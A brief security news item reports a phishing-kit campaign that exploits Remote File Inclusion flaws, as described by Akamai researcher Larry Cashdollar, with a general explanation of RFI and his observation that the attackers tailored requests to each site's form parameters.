A campaign that leverages Remote File Inclusion (RFI) vulnerabilities for deploying phishing kits has been identified. The campaign was identified by security researcher Larry Cashdollar of Akamai. According to Cashdollar, a server was reported to output a file crafted by the attackers in this attack.
RFI attacks are carried out by exploiting faulty inclusion functions within a website or an application. These can also lead to other attacks such as cross-site scripting (XSS), denial-of-service (DoS) or information disclosure.
The big picture
Cashdollar mentions that the RFI attempts were modified according to the target.
“The RFI attempts recorded in my logs were tailored to the page being tested. If the website being targeted uses form_id= for example, then the requests will match that instead of the generic (and commonly used) page_id= or page=. This tells us the attacker is likely parsing the HTML, and examining the variables being sent to via form to the backend,” said Cashdollar.